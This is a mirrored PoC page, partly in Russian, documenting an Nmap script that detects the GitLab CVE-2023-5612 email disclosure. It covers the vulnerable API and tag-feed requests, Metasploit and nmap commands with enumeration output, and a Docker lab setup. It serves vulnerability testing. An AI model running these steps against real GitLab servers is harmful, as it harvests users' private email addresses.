POC详情: 29db85d6c703938e34a50e5807aac4a4a6023549

来源
https://github.com/mad3E7cat/CVE-2023-5612
关联漏洞
标题: GitLab 安全漏洞 (CVE-2023-5612)
描述:GitLab是美国GitLab公司的一个开源的端到端软件开发平台,具有内置的版本控制、问题跟踪、代码审查、CI/CD(持续集成和持续交付)等功能。 GitLab 16.6.6之前版本、16.7版本至16.7.4之前版本、16.8版本至16.8.1之前版本存在安全漏洞。攻击者利用该漏洞可以通过标签源读取用户电子邮件地址。
描述
Nmap NSE to check for CVE-2023-5612
介绍
# Disclosure of the public email in Tags RSS Feed

https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/
```
An issue has been discovered in GitLab affecting all versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. It was possible to read the user email address via tags feed although the visibility in the user profile has been disabled. This is a medium severity issue (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N, 5.3). It is now mitigated in the latest release and is assigned CVE-2023-5612.
```
https://nvd.nist.gov/vuln/detail/CVE-2023-5612
```
An issue has been discovered in GitLab affecting all versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. It was possible to read the user email address via tags feed although the visibility in the user profile has been disabled.
```

## Описание
В GitLab обнаружена уязвимость, позволяющая получить список почт пользователей (и имен), даже если некоторые пользователи имеют скрытый профиль. Это происходит из-за возможности неаутентифицированно получить доступ к эндпоинту `/api/v4/projects`. Для каждого проекта можно взять `web_url`, и отправить запрос на эндпоинт `/-/tags?format=atom`, получив в ответ xml в котором, в том числе, будет видно имя и почту пользователя:
```xml
...
    <name>test</name>
    <email>test@test.com</email>
...
```


## NSE Dev
PoC: 
- https://hackerone.com/reports/2208790
- https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb
- https://sploitus.com/?query=CVE-2023-5612#exploits

**Обратить внимание**: есть [nse-скрипт](https://github.com/TopskiyPavelQwertyGang/Review.CVE-2023-5612) для якобы этой уязвы, но если обратить внимание на его название и содержание - становится ясно, что это ошибка и он не касается данной CVE.

#### Алгоритм: 
1. Получить названия всех доступных проектов:
```http
GET /api/v4/projects?output_mode=json HTTP/1.1
```
Пример ответа:
```json
[{"id":3,"description":null,"name":"project3","name_with_namespace":"test / project3","path":"project3","path_with_namespace":"test/project3","created_at":"2025-09-13T16:39:05.885Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"ssh://git@localhost:2424/test/project3.git","http_url_to_repo":"http://localhost:8929/test/project3.git","web_url":"http://localhost:8929/test/project3","readme_url":"http://localhost:8929/test/project3/-/blob/main/README.md","forks_count":0,"avatar_url":null,"star_count":0,"last_activity_at":"2025-09-13T16:39:05.885Z","namespace":{"id":4,"name":"test","path":"test","kind":"user","full_path":"test","parent_id":null,"avatar_url":"https://www.gravatar.com/avatar/b642b4217b34b1e8d3bd915fc65c4452?s=80\u0026d=identicon","web_url":"http://localhost:8929/test"}},{"id":2,"description":null,"name":"project2","name_with_namespace":"testgroup / project2","path":"project2","path_with_namespace":"testgroup/project2","created_at":"2025-09-13T16:35:26.979Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"ssh://git@localhost:2424/testgroup/project2.git","http_url_to_repo":"http://localhost:8929/testgroup/project2.git","web_url":"http://localhost:8929/testgroup/project2","readme_url":"http://localhost:8929/testgroup/project2/-/blob/main/README.md","forks_count":0,"avatar_url":null,"star_count":0,"last_activity_at":"2025-09-13T16:35:26.979Z","namespace":{"id":3,"name":"testgroup","path":"testgroup","kind":"group","full_path":"testgroup","parent_id":null,"avatar_url":null,"web_url":"http://localhost:8929/groups/testgroup"}},{"id":1,"description":null,"name":"test","name_with_namespace":"Administrator / test","path":"test","path_with_namespace":"root/test","created_at":"2025-09-12T15:03:47.319Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"ssh://git@localhost:2424/root/test.git","http_url_to_repo":"http://localhost:8929/root/test.git","web_url":"http://localhost:8929/root/test","readme_url":"http://localhost:8929/root/test/-/blob/main/README.md","forks_count":0,"avatar_url":null,"star_count":0,"last_activity_at":"2025-09-13T16:19:10.901Z","namespace":{"id":1,"name":"Administrator","path":"root","kind":"user","full_path":"root","parent_id":null,"avatar_url":"https://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=80\u0026d=identicon","web_url":"http://localhost:8929/root"}}]
```

2. Для каждого получить тэги в atom-xml формате:
```
GET /test/project3/-/tags?format=atom HTTP/1.1
GET /root/test/-/tags?format=atom HTTP/1.1
```
Пример ответа:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
<title>project3 tags</title>
<link href="http://127.0.0.1:8929/test/project3/-/tags?format=atom" rel="self" type="application/atom+xml"/>
<link href="http://127.0.0.1:8929/test/project3/-/tags" rel="alternate" type="text/html"/>
<id>http://127.0.0.1:8929/test/project3/-/tags</id>
<entry>
  <id>http://127.0.0.1:8929/test/project3/-/tags/1.0.0</id>
  <link href="http://127.0.0.1:8929/test/project3/-/tags/1.0.0"/>
  <title>1.0.0</title>
  <summary></summary>
  <content type="html"></content>
  <media:thumbnail width="40" height="40" url="https://www.gravatar.com/avatar/b642b4217b34b1e8d3bd915fc65c4452?s=80&amp;d=identicon"/>
  <author>
    <name>test</name>
    <email>test@test.com</email>
  </author>
</entry>
</feed>
```
в этом файле мы видим поля `name`, `email` всех авторов тегов в данном проекте. Их раскрытие атакующему и есть суть уязвимости. 

Пример успешной эксплуатации:
```bash
# Metasploit
use auxiliary/gather/gitlab_tags_rss_feed_email_disclosure
set RHOSTS 127.0.0.1
set RPORT 8929
run
```
Результат:
```bash
auxiliary(gather/gitlab_tags_rss_feed_email_disclosure) > run
[*] Running module against 127.0.0.1
[+] Scraping ALL projects...
[+] name: test
[+] e-mail: test@test.com
[+] name: Administrator
[+] e-mail: admin@example.com
[*] Auxiliary module execution completed
```

## NSE Test
Проверка производилась на `GitLab CE 16.5.10`
#### `docker-compose.yml`
```yaml
services:
  gitlab:
    image: gitlab/gitlab-ce:16.5.10-ce.0
    container_name: gitlab-ce
    restart: always
    hostname: 'gitlab.example.com'
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url 'http://localhost:8929'
        gitlab_rails['gitlab_shell_ssh_port'] = 2424
    ports:
      - '8929:8929'
      - '443:443'
      - '2424:22'
    volumes:
      - '$GITLAB_HOME/config:/etc/gitlab'
      - '$GITLAB_HOME/logs:/var/log/gitlab'
      - '$GITLAB_HOME/data:/var/opt/gitlab'
    shm_size: '256m'
```
#### Launch && prepare test env
1. Поднять уязвимый `gitlab-ce` в docker:
```bash
sudo docker compose up
sudo docker exec -it {CONTAINER_ID} grep 'Password:' /etc/gitlab/initial_root_password
# Do not decode the showed base64 value, just use it as is
# Change root's creds to smth like root:toortoor
```

2. Подготовить его:
- войти как root
- создать проект
- создать тэг для проекта от имени `root`
- создать польщователя `test`, войти как `test`
- создать проект от имени `test`
- создать тэг для проекта от имени `test`

2. Запустить скрипт: 
```bash
# full scan
nmap --script cve-2023-5612 <TARGET> -p <PORT>
nmap --script cve-2023-5612 <TARGET> -p <PORT> --script-args check_mode=full
# fast scan
nmap --script cve-2023-5612 <TARGET> -p <PORT> --script-args check_mode=fast
```

Пример успешной эксплутации:
```bash
nmap -Pn --script cve-2023-5612 localhost -p 8929 --script-args check_mode=full
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 16:39 MSK
####### CVE-2023-5612 #######
[+] Checking target...
[+] Checking for vulnerability...
[+] Projects found:
        http://localhost:8929/test/project3
        http://localhost:8929/testgroup/project2
        http://localhost:8929/root/test
[+] Results:
        email,username,project_url
        test@test.com,test,http://localhost:8929/test/project3
        admin@example.com,Administrator,http://localhost:8929/testgroup/project2
        admin@example.com,Administrator,http://localhost:8929/root/test
[+] Writing results to ./gitlab_enumerated.csv...
[+] Done
#############################

Nmap scan report for localhost (127.0.0.1)
Host is up (0.00013s latency).
Other addresses for localhost (not scanned): ::1

PORT     STATE SERVICE
8929/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1.64 seconds
# view saved results, show only emails
tail -n +2 gitlab_enumerated.csv | cut -d "," -f 1| sort -u
admin@example.com
test@test.com
```

Пример НЕ-успешной эксплуатации на примере не GitLab:
```bash
nmap --script cve-2023-5612 localhost -p 1337
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 06:35 MSK
####### CVE-2023-5612 #######
[+] Checking target...
[-] Error: The target is not a GitLab instance. Exiting...
#############################
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00012s latency).
Other addresses for localhost (not scanned): ::1

PORT     STATE SERVICE
1337/tcp open  waste

Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
```

Пример эксплуатции на реальной НЕ-уязвимой цели:
```bash
nmap -Pn -p 7180 --script cve-2023-5612 <IP-addr> --script-args check_mode=fast
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 16:37 MSK
####### CVE-2023-5612 #######
[+] Checking target...
[+] Checking for vulnerability...
[-] Projects list seems to be empty or unavailable
[-] Target is NOT vulnerable
#############################
```

## Links
- https://vuldb.com/?id.252096
- https://hackerone.com/reports/2208790
- https://www.rapid7.com/db/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure/
- https://scm.cms.hu-berlin.de/safeguarding/cvelistV5/-/blob/cve_2025-05-08_0800Z/cves/2023/5xxx/CVE-2023-5612.json
- https://docs.gitlab.com/install/docker/installation/
- https://hub.docker.com/r/gitlab/gitlab-ce/tags/?page=4
- https://hub.docker.com/layers/gitlab/gitlab-ce/16.5.10-ce.0/images/sha256-a8a3b7904bb5f92b7fd55e924d65c08aac1999ba5a2670f17c00472918ae6f42
- https://cve.akaoma.com/cve-2023-5612
文件快照

 [4.0K]  /data/pocs/29db85d6c703938e34a50e5807aac4a4a6023549
├── [7.8K]  cve-2023-5612.nse
├── [ 523]  docker-compose.yml
└── [ 11K]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。